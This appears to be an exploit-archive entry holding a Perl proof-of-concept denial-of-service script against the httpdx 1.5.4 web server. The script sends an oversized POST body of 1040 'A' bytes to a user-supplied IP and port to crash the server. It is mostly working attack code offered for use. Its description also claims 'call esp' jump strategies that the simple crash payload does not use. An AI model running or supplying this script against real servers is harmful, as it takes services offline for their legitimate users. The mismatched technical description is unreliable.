id: 39229
date: 01/08/2024
title: httpdx 1.5.4 Denial Of Service Exploit
author: Fernando Mengali
cves: 

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: httpdx 1.5.4 - Denied of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 06 january 2024
# Vendor Homepage:  http://httpdx.sourceforge.net
# Download to demo: https://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.4/
# Download 2 to demo:https://drive.google.com/file/d/1Slsd7qCPom4uoSPXdiONS4xh-8tp4fkV/view?usp=sharing
# Notification vendor: No reported
# Tested Version: httpdx 1.5.4 - Denied of Service (DoS)
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denied of Service (DoS)
# Vídeo: https://drive.google.com/file/d/1hGn5AZbtVTzA_oiZPZ9yOVzIBVzKYGhQ/view?usp=sharing

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.
#The web server does not correctly handle the amount of data or bytes sent.
#When authenticating to the web server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denied of service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){
      $cmd="cls";
    } else {
      $cmd="clear";
    }

    system("$cmd");
    
    intro();
    main();
    
    print "[+] Exploiting... \n";

   my $sock = IO::Socket::INET->new("$ip:$port");

   my $exploit = "\x41"x1040;

   print $sock "POST /index2.html HTTP/1.0\r\n" . 
    "Content-Length: 1023\r\n" . 
    "Content-Type: html\r\n" . 
    "Host: $ip" . "\r\n" .
    "\r\n" .
    $exploit;
            
    print "[+] Done - Exploited success!!!!!\n\n";
  
   sub intro {
      print q {

      ---------- # ------------------------------------------------------------------
      --------- ##= -------------- [+] httpdx 1.5.4 - Denied of Service (DoS) -------
      -------- ##=== ----------------------------------------------------------------
      ------ ###==#=== --------------------------------------------------------------
      ---- ####===##==== ------------------------------------------------------------
      -- #####====###===== -----          Coded by Fernando Mengali             -----
      - #####=====####===== -----        fernando.mengalli@gmail.com            -----
      - #####=====####===== ---------------------------------------------------------
      --- ####=  #  #==== --------    Prepare to exploiting the server   ------------
      --------- ##= -----------------------------------------------------------------
      ------- ####=== ---------------------------------------------------------------

      }
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";
        exit(-1);

      }
  }

#  0day.today [2024-01-15]  #